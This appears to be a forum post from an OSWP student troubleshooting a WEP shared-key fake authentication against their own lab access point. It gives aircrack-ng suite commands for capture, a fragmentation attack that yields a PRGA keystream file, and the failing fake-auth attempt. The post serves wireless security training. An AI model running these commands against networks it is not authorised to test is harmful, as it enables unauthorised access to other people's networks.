I have what I think is a simple question. I am in the middle of taking the OSWP course and have a question about authenticating against a WEP-encrypted network with SKA enabled. For reference:
$ap = my AP's MAC
$alfa = my MAC
$pc = another laptop I have connected to my AP's MAC
My goal is to fakeauth with my alfa card to my AP by using a PRGA .xor generated via a fragmentation attack. Yes I know there are other ways I can inject (e.g. spoof my other client's MAC as my own after deauthing the other client, etc and fakeauth as that source mac). I don't want to do that because in a real life scenario (i.e. a pentest) it could be noticed and a good attacker probably would try to avoid it. Anyway - that aside, I must be missing something stupid here:
First I monitor my AP via airpdump-ng with:
And see the output w/ no problem, my PC connected to it, etc. (I'm posting this from a different computer so I can't copy and paste the output right now and I don't think it's necessary for this cause I know it's correct).
airodump-ng -c 6 --bssid $ap -w wepviaclient wlan0
Then I fragment to generate the .xor file:
A .xor is generated.
aireplay-ng -5 -b $ap -h $alfa -l 255.255.255.255 -k 255.255.255.255 wlan0
Then I attempt to fakeauth:
And I get:
aireplay-ng -1 0 -a $ap -h $alfa -y fragment-0629-233133.xor wlan0
Over, and over, and over.
Sending Authentication Request (Shared Key) [ACK]
Authentication 1/2 successful
Sending encrypted challenge [ACK]
The one thing I don't quite understand are the -l and -k switches when generating the .xor (I assume this is just so the AP will pass the packet through but some clarification there might be the key). Any ideas what I'm doing wrong? I feel like it's something very simple that I'm missing. In the mean time, turning off SKA or generating ARPs as an auth'd client works fine to increase IVs and I have already cracked the key several times. I don't know if this is really relevant to the course or not but I really want to know why this doesn't work.